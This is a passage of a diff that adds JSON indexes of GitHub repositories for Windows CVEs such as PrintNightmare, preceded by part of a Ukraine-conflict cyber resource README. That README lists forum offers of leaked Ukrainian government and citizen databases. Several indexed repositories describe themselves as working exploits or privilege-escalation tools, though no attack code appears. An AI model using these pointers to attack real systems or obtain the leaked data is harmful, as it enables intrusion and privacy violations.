| | FreeCivilian | UA data sharing | DB of health\\[.\\]mia\\[.\\]solutions | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mtsbu\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of motorsich\\[.\\]com | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of kyivcity\\[.\\]com | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of bdr\\[.\\]mvs\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of gkh\\[.\\]in\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of kmu\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mon\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of minagro\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | FreeCivilian | UA data sharing | DB of mfa\\[.\\]gov\\[.\\]ua | No | TA discussion in past 90 days | FreeCivilian .onion \\[not linked\\] | | Intel\\_Data | UA data sharing | PII DB (56M) of Ukrainian Citizens | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | Kristina | UA data sharing | DB of Ukrainian National Police (mvs\\[.\\]gov\\[.\\]ua) | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | NetSec | UA data sharing | PII DB (53M) of Ukrainian citizens | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | Psycho\\_Killer | UA data sharing | PII DB (56M) of Ukrainian Citizens | No | TA discussion in past 90 days | Exploit Forum .onion \\[not linked\\] | | Sp333 | UA data sharing | PII DB of Ukrainian and Russian interpreters, translators, and tour guides | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | Vaticano | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine \\[copy\\] | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | | Vaticano | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion\\[.\\]gov\\[.\\]ua) \\[copy\\] | No | TA discussion in past 90 days | RaidForums \\[not linked; site hijacked since UA invasion\\] | #### `Vendor Support` | Vendor | Offering | URL | | --- | --- | --- | | Dragos | Access to Dragos service if from US\/UK\/ANZ and in need of ICS cybersecurity support | [twitter.com\/RobertMLee](https:\/\/twitter.com\/RobertMLee\/status\/1496862093588455429) | | GreyNoise | Any and all `Ukrainian` emails registered to GreyNoise have been upgraded to VIP which includes full, uncapped enterprise access to all GreyNoise products | [twitter.com\/Andrew___Morris](https:\/\/twitter.com\/Andrew___Morris\/status\/1496923545712091139) | | Recorded Future | Providing free intelligence-driven insights, perspectives, and mitigation strategies as the situation in Ukraine evolves| [recordedfuture.com](https:\/\/www.recordedfuture.com\/ukraine\/) | | Flashpoint | Free Access to Flashpoint’s Latest Threat Intel on Ukraine | [go.flashpoint-intel.com](https:\/\/go.flashpoint-intel.com\/trial\/access\/30days) | | ThreatABLE | A Ukraine tag for free threat intelligence feed that's more highly curated to cyber| [twitter.com\/threatable](https:\/\/twitter.com\/threatable\/status\/1497233721803644950) | | Orange | IOCs related to Russia-Ukraine 2022 conflict extracted from our Datalake Threat Intelligence platform. | [github.com\/Orange-Cyberdefense](https:\/\/github.com\/Orange-Cyberdefense\/russia-ukraine_IOCs)| | FSecure | F-Secure FREEDOME VPN is now available for free in all of Ukraine | [twitter.com\/FSecure](https:\/\/twitter.com\/FSecure\/status\/1497248407303462960) | | Multiple vendors | List of vendors offering their services to Ukraine for free, put together by [@chrisculling](https:\/\/twitter.com\/chrisculling\/status\/1497023038323404803) | [docs.google.com\/spreadsheets](https:\/\/docs.google.com\/spreadsheets\/d\/18WYY9p1_DLwB6dnXoiiOAoWYD8X0voXtoDl_ZQzjzUQ\/edit#gid=0) | | Mandiant | Free threat intelligence, webinar and guidance for defensive measures relevant to the situation in Ukraine. | [mandiant.com](https:\/\/www.mandiant.com\/resources\/insights\/ukraine-crisis-resource-center) | | Starlink | Satellite internet constellation operated by SpaceX providing satellite Internet access coverage to Ukraine | [twitter.com\/elonmusk](https:\/\/twitter.com\/elonmusk\/status\/1497701484003213317) | | Romania DNSC | Romania’s DNSC – in partnership with Bitdefender – will provide technical consulting, threat intelligence and, free of charge, cybersecurity technology to any business, government institution or private citizen of Ukraine for as long as it is necessary. | [Romania's DNSC Press Release](https:\/\/dnsc.ro\/citeste\/press-release-dnsc-and-bitdefender-work-together-in-support-of-ukraine)| | BitDefender | Access to Bitdefender technical consulting, threat intelligence and both consumer and enterprise cybersecurity technology | [bitdefender.com\/ukraine\/](https:\/\/www.bitdefender.com\/ukraine\/) | | NameCheap | Free anonymous hosting and domain name registration to any anti-Putin anti-regime and protest websites for anyone located within Russia and Belarus | [twitter.com\/Namecheap](https:\/\/twitter.com\/Namecheap\/status\/1498998414020861953) | | Avast | Free decryptor for PartyTicket ransomware | [decoded.avast.io](https:\/\/decoded.avast.io\/threatresearch\/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware\/) | #### `Vetted OSINT Sources` | Handle | Affiliation | | --- | --- | | [@KyivIndependent](https:\/\/twitter.com\/KyivIndependent) | English-language journalism in Ukraine | | [@IAPonomarenko](https:\/\/twitter.com\/IAPonomarenko) | Defense reporter with The Kyiv Independent | | [@KyivPost](https:\/\/twitter.com\/KyivPost) | English-language journalism in Ukraine | | [@Shayan86](https:\/\/twitter.com\/Shayan86) | BBC World News Disinformation journalist | | [@Liveuamap](https:\/\/twitter.com\/Liveuamap) | Live Universal Awareness Map (“Liveuamap”) independent global news and information site | | [@DAlperovitch](https:\/\/twitter.com\/DAlperovitch) | The Alperovitch Institute for Cybersecurity Studies, Founder & Former CTO of CrowdStrike | | [@COUPSURE](https:\/\/twitter.com\/COUPSURE) | OSINT investigator for Centre for Information Resilience | | [@netblocks](https:\/\/twitter.com\/netblocks) | London-based Internet's Observatory | #### `Miscellaneous Resources` | Source | URL | Content | | --- | --- | --- | | PowerOutages.com | https:\/\/poweroutage.com\/ua | Tracking PowerOutages across Ukraine | | Monash IP Observatory | https:\/\/twitter.com\/IP_Observatory | Tracking IP address outages across Ukraine | | Project Owl Discord | https:\/\/discord.com\/invite\/projectowl | Tracking foreign policy, geopolitical events, military and governments, using a Discord-based crowdsourced approach, with a current emphasis on Ukraine and Russia | | russianwarchatter.info | https:\/\/www.russianwarchatter.info\/ | Known Russian Military Radio Frequencies |",
+ "fork": false,
+ "created_at": "2022-03-04T09:00:59Z",
+ "updated_at": "2024-06-23T22:34:47Z",
+ "pushed_at": "2022-03-04T09:03:14Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1647.json b/2021/CVE-2021-1647.json
new file mode 100644
index 0000000000..a8d6a6295d
--- /dev/null
+++ b/2021/CVE-2021-1647.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 332213147,
+ "name": "cve-2021-1647",
+ "full_name": "findcool\/cve-2021-1647",
+ "owner": {
+ "login": "findcool",
+ "id": 73280456,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73280456?v=4",
+ "html_url": "https:\/\/github.com\/findcool"
+ },
+ "html_url": "https:\/\/github.com\/findcool\/cve-2021-1647",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-23T13:10:35Z",
+ "updated_at": "2021-01-23T13:10:37Z",
+ "pushed_at": "2021-01-20T14:55:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1656.json b/2021/CVE-2021-1656.json
new file mode 100644
index 0000000000..6c1f136f90
--- /dev/null
+++ b/2021/CVE-2021-1656.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 352879385,
+ "name": "CVE-2021-1656",
+ "full_name": "waleedassar\/CVE-2021-1656",
+ "owner": {
+ "login": "waleedassar",
+ "id": 5983995,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4",
+ "html_url": "https:\/\/github.com\/waleedassar"
+ },
+ "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-1656",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-30T05:21:26Z",
+ "updated_at": "2024-02-24T07:53:20Z",
+ "pushed_at": "2021-03-30T05:31:22Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-1675.json b/2021/CVE-2021-1675.json
new file mode 100644
index 0000000000..ef5a13a13b
--- /dev/null
+++ b/2021/CVE-2021-1675.json
@@ -0,0 +1,1384 @@
+[
+ {
+ "id": 381392691,
+ "name": "CVE-2021-1675",
+ "full_name": "yu2u\/CVE-2021-1675",
+ "owner": {
+ "login": "yu2u",
+ "id": 25322880,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25322880?v=4",
+ "html_url": "https:\/\/github.com\/yu2u"
+ },
+ "html_url": "https:\/\/github.com\/yu2u\/CVE-2021-1675",
+ "description": "CVE-2021-1675 exploit",
+ "fork": false,
+ "created_at": "2021-06-29T14:24:30Z",
+ "updated_at": "2021-09-15T02:02:40Z",
+ "pushed_at": "2021-06-29T14:26:25Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 381444656,
+ "name": "CVE-2021-1675",
+ "full_name": "cube0x0\/CVE-2021-1675",
+ "owner": {
+ "login": "cube0x0",
+ "id": 39370848,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39370848?v=4",
+ "html_url": "https:\/\/github.com\/cube0x0"
+ },
+ "html_url": "https:\/\/github.com\/cube0x0\/CVE-2021-1675",
+ "description": "C# and Impacket implementation of PrintNightmare CVE-2021-1675\/CVE-2021-34527",
+ "fork": false,
+ "created_at": "2021-06-29T17:24:14Z",
+ "updated_at": "2024-06-25T06:11:59Z",
+ "pushed_at": "2021-07-20T15:28:13Z",
+ "stargazers_count": 1812,
+ "watchers_count": 1812,
+ "has_discussions": false,
+ "forks_count": 584,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 584,
+ "watchers": 1812,
+ "score": 0,
+ "subscribers_count": 44
+ },
+ {
+ "id": 381799016,
+ "name": "CVE-2021-1675",
+ "full_name": "LaresLLC\/CVE-2021-1675",
+ "owner": {
+ "login": "LaresLLC",
+ "id": 63059624,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059624?v=4",
+ "html_url": "https:\/\/github.com\/LaresLLC"
+ },
+ "html_url": "https:\/\/github.com\/LaresLLC\/CVE-2021-1675",
+ "description": "CVE-2021-1675 Detection Info",
+ "fork": false,
+ "created_at": "2021-06-30T18:32:17Z",
+ "updated_at": "2024-04-07T05:50:52Z",
+ "pushed_at": "2023-05-20T01:53:16Z",
+ "stargazers_count": 218,
+ "watchers_count": 218,
+ "has_discussions": false,
+ "forks_count": 38,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 38,
+ "watchers": 218,
+ "score": 0,
+ "subscribers_count": 19
+ },
+ {
+ "id": 381858715,
+ "name": "patch-cve-2021-1675",
+ "full_name": "kondah\/patch-cve-2021-1675",
+ "owner": {
+ "login": "kondah",
+ "id": 7760108,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7760108?v=4",
+ "html_url": "https:\/\/github.com\/kondah"
+ },
+ "html_url": "https:\/\/github.com\/kondah\/patch-cve-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-30T23:39:21Z",
+ "updated_at": "2023-09-28T11:29:08Z",
+ "pushed_at": "2021-06-30T23:40:44Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 381971547,
+ "name": "CVE-2021-1675-LPE-EXP",
+ "full_name": "evilashz\/CVE-2021-1675-LPE-EXP",
+ "owner": {
+ "login": "evilashz",
+ "id": 50722929,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50722929?v=4",
+ "html_url": "https:\/\/github.com\/evilashz"
+ },
+ "html_url": "https:\/\/github.com\/evilashz\/CVE-2021-1675-LPE-EXP",
+ "description": "PrintNightmare , Local Privilege Escalation of CVE-2021-1675 or CVE-2021-34527",
+ "fork": false,
+ "created_at": "2021-07-01T09:00:31Z",
+ "updated_at": "2024-05-30T04:11:59Z",
+ "pushed_at": "2021-07-02T10:47:36Z",
+ "stargazers_count": 58,
+ "watchers_count": 58,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-1675",
+ "cve-2021-34527",
+ "hacktool",
+ "lpe",
+ "printnightmare",
+ "redteam",
+ "redteam-tools",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 58,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 381984439,
+ "name": "CVE-2021-1675-LPE",
+ "full_name": "hlldz\/CVE-2021-1675-LPE",
+ "owner": {
+ "login": "hlldz",
+ "id": 16455559,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16455559?v=4",
+ "html_url": "https:\/\/github.com\/hlldz"
+ },
+ "html_url": "https:\/\/github.com\/hlldz\/CVE-2021-1675-LPE",
+ "description": "Local Privilege Escalation Edition for CVE-2021-1675\/CVE-2021-34527",
+ "fork": false,
+ "created_at": "2021-07-01T09:47:13Z",
+ "updated_at": "2024-06-07T14:59:39Z",
+ "pushed_at": "2021-07-05T06:46:12Z",
+ "stargazers_count": 329,
+ "watchers_count": 329,
+ "has_discussions": false,
+ "forks_count": 79,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cobaltstrike",
+ "cve-2021-1675",
+ "cve-2021-34527",
+ "exploit",
+ "lpe",
+ "printnightmare",
+ "reflectivedll",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 79,
+ "watchers": 329,
+ "score": 0,
+ "subscribers_count": 14
+ },
+ {
+ "id": 382024474,
+ "name": "CVE-2021-1675",
+ "full_name": "puckiestyle\/CVE-2021-1675",
+ "owner": {
+ "login": "puckiestyle",
+ "id": 57447087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4",
+ "html_url": "https:\/\/github.com\/puckiestyle"
+ },
+ "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-01T12:24:19Z",
+ "updated_at": "2023-09-28T11:29:09Z",
+ "pushed_at": "2021-10-31T15:29:21Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382050919,
+ "name": "CVE-2021-1675_PrintNightMare",
+ "full_name": "cybersecurityworks553\/CVE-2021-1675_PrintNightMare",
+ "owner": {
+ "login": "cybersecurityworks553",
+ "id": 63910792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4",
+ "html_url": "https:\/\/github.com\/cybersecurityworks553"
+ },
+ "html_url": "https:\/\/github.com\/cybersecurityworks553\/CVE-2021-1675_PrintNightMare",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-01T13:58:01Z",
+ "updated_at": "2024-05-13T12:47:21Z",
+ "pushed_at": "2021-11-18T16:46:46Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382141130,
+ "name": "CVE-2021-1675",
+ "full_name": "tanarchytan\/CVE-2021-1675",
+ "owner": {
+ "login": "tanarchytan",
+ "id": 2339027,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2339027?v=4",
+ "html_url": "https:\/\/github.com\/tanarchytan"
+ },
+ "html_url": "https:\/\/github.com\/tanarchytan\/CVE-2021-1675",
+ "description": "Fix without disabling Print Spooler",
+ "fork": false,
+ "created_at": "2021-07-01T19:50:46Z",
+ "updated_at": "2023-09-28T11:29:10Z",
+ "pushed_at": "2021-07-02T04:32:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382182179,
+ "name": "CVE-2021-1675",
+ "full_name": "calebstewart\/CVE-2021-1675",
+ "owner": {
+ "login": "calebstewart",
+ "id": 7529189,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7529189?v=4",
+ "html_url": "https:\/\/github.com\/calebstewart"
+ },
+ "html_url": "https:\/\/github.com\/calebstewart\/CVE-2021-1675",
+ "description": "Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)",
+ "fork": false,
+ "created_at": "2021-07-01T23:45:58Z",
+ "updated_at": "2024-06-14T11:53:15Z",
+ "pushed_at": "2021-07-05T08:54:06Z",
+ "stargazers_count": 978,
+ "watchers_count": 978,
+ "has_discussions": false,
+ "forks_count": 231,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 231,
+ "watchers": 978,
+ "score": 0,
+ "subscribers_count": 27
+ },
+ {
+ "id": 382200984,
+ "name": "CVE-2021-1675-SCANNER",
+ "full_name": "Leonidus0x10\/CVE-2021-1675-SCANNER",
+ "owner": {
+ "login": "Leonidus0x10",
+ "id": 72128281,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72128281?v=4",
+ "html_url": "https:\/\/github.com\/Leonidus0x10"
+ },
+ "html_url": "https:\/\/github.com\/Leonidus0x10\/CVE-2021-1675-SCANNER",
+ "description": "Vulnerability Scanner for CVE-2021-1675\/PrintNightmare",
+ "fork": false,
+ "created_at": "2021-07-02T01:45:00Z",
+ "updated_at": "2023-09-28T11:29:10Z",
+ "pushed_at": "2021-07-02T01:52:46Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-1675",
+ "exploit",
+ "hacktheplanet",
+ "python",
+ "scanner"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382249207,
+ "name": "CVE-2021-1675",
+ "full_name": "thomasgeens\/CVE-2021-1675",
+ "owner": {
+ "login": "thomasgeens",
+ "id": 2236721,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2236721?v=4",
+ "html_url": "https:\/\/github.com\/thomasgeens"
+ },
+ "html_url": "https:\/\/github.com\/thomasgeens\/CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-02T06:14:29Z",
+ "updated_at": "2023-09-28T11:29:11Z",
+ "pushed_at": "2021-07-02T06:14:39Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 382266932,
+ "name": "CVE-2021-1675_CarbonBlack_HuntingQuery",
+ "full_name": "mrezqi\/CVE-2021-1675_CarbonBlack_HuntingQuery",
+ "owner": {
+ "login": "mrezqi",
+ "id": 2455832,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2455832?v=4",
+ "html_url": "https:\/\/github.com\/mrezqi"
+ },
+ "html_url": "https:\/\/github.com\/mrezqi\/CVE-2021-1675_CarbonBlack_HuntingQuery",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-02T07:30:24Z",
+ "updated_at": "2023-09-28T11:29:11Z",
+ "pushed_at": "2021-07-02T08:01:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 382399375,
+ "name": "CVE-2021-1675-PrintNightmare",
+ "full_name": "killtr0\/CVE-2021-1675-PrintNightmare",
+ "owner": {
+ "login": "killtr0",
+ "id": 22793707,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22793707?v=4",
+ "html_url": "https:\/\/github.com\/killtr0"
+ },
+ "html_url": "https:\/\/github.com\/killtr0\/CVE-2021-1675-PrintNightmare",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-02T16:12:15Z",
+ "updated_at": "2023-09-28T11:29:12Z",
+ "pushed_at": "2021-07-02T16:12:59Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382407157,
+ "name": "CVE-2021-1675",
+ "full_name": "corelight\/CVE-2021-1675",
+ "owner": {
+ "login": "corelight",
+ "id": 21672558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
+ "html_url": "https:\/\/github.com\/corelight"
+ },
+ "html_url": "https:\/\/github.com\/corelight\/CVE-2021-1675",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-02T16:44:24Z",
+ "updated_at": "2023-09-28T11:29:12Z",
+ "pushed_at": "2021-07-09T14:17:40Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 382418030,
+ "name": "CVE-2021-1675",
+ "full_name": "kougyokugentou\/CVE-2021-1675",
+ "owner": {
+ "login": "kougyokugentou",
+ "id": 41278462,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41278462?v=4",
+ "html_url": "https:\/\/github.com\/kougyokugentou"
+ },
+ "html_url": "https:\/\/github.com\/kougyokugentou\/CVE-2021-1675",
+ "description": "A small powershell script to disable print spooler service using desired state configuration",
+ "fork": false,
+ "created_at": "2021-07-02T17:29:04Z",
+ "updated_at": "2021-12-22T20:12:23Z",
+ "pushed_at": "2021-07-02T17:40:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382425733,
+ "name": "CVE-2021-1675",
+ "full_name": "ptter23\/CVE-2021-1675",
+ "owner": {
+ "login": "ptter23",
+ "id": 55167410,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55167410?v=4",
+ "html_url": "https:\/\/github.com\/ptter23"
+ },
+ "html_url": "https:\/\/github.com\/ptter23\/CVE-2021-1675",
+ "description": "CVE-2021-1675: ZERO-DAY VULNERABILITY IN WINDOWS PRINTER SERVICE WITH AN EXPLOIT AVAILABLE IN ALL OPERATING SYSTEM VERSIONS",
+ "fork": false,
+ "created_at": "2021-07-02T18:01:21Z",
+ "updated_at": "2023-09-28T11:29:12Z",
+ "pushed_at": "2021-07-02T18:07:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382496518,
+ "name": "cve-2021-1675-printnightmare",
+ "full_name": "initconf\/cve-2021-1675-printnightmare",
+ "owner": {
+ "login": "initconf",
+ "id": 4044729,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4044729?v=4",
+ "html_url": "https:\/\/github.com\/initconf"
+ },
+ "html_url": "https:\/\/github.com\/initconf\/cve-2021-1675-printnightmare",
+ "description": "to catch cve-2021-1675-printnightmare",
+ "fork": false,
+ "created_at": "2021-07-03T01:04:06Z",
+ "updated_at": "2023-09-28T11:29:13Z",
+ "pushed_at": "2021-07-03T01:08:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 382609559,
+ "name": "PrintNightmare",
+ "full_name": "ozergoker\/PrintNightmare",
+ "owner": {
+ "login": "ozergoker",
+ "id": 86879266,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879266?v=4",
+ "html_url": "https:\/\/github.com\/ozergoker"
+ },
+ "html_url": "https:\/\/github.com\/ozergoker\/PrintNightmare",
+ "description": "Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmare)",
+ "fork": false,
+ "created_at": "2021-07-03T12:25:21Z",
+ "updated_at": "2023-09-28T11:29:13Z",
+ "pushed_at": "2021-07-03T12:43:26Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 382815972,
+ "name": "PrintNightmare-CVE-2021-1675",
+ "full_name": "exploitblizzard\/PrintNightmare-CVE-2021-1675",
+ "owner": {
+ "login": "exploitblizzard",
+ "id": 61627070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4",
+ "html_url": "https:\/\/github.com\/exploitblizzard"
+ },
+ "html_url": "https:\/\/github.com\/exploitblizzard\/PrintNightmare-CVE-2021-1675",
+ "description": "Youtube : https:\/\/youtu.be\/Zr0KjYDSFKQ",
+ "fork": false,
+ "created_at": "2021-07-04T09:50:39Z",
+ "updated_at": "2024-04-27T08:51:01Z",
+ "pushed_at": "2021-07-04T09:57:46Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 383128850,
+ "name": "CVE-2021-1675",
+ "full_name": "edsonjt81\/CVE-2021-1675",
+ "owner": {
+ "login": "edsonjt81",
+ "id": 27496739,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4",
+ "html_url": "https:\/\/github.com\/edsonjt81"
+ },
+ "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2021-1675",
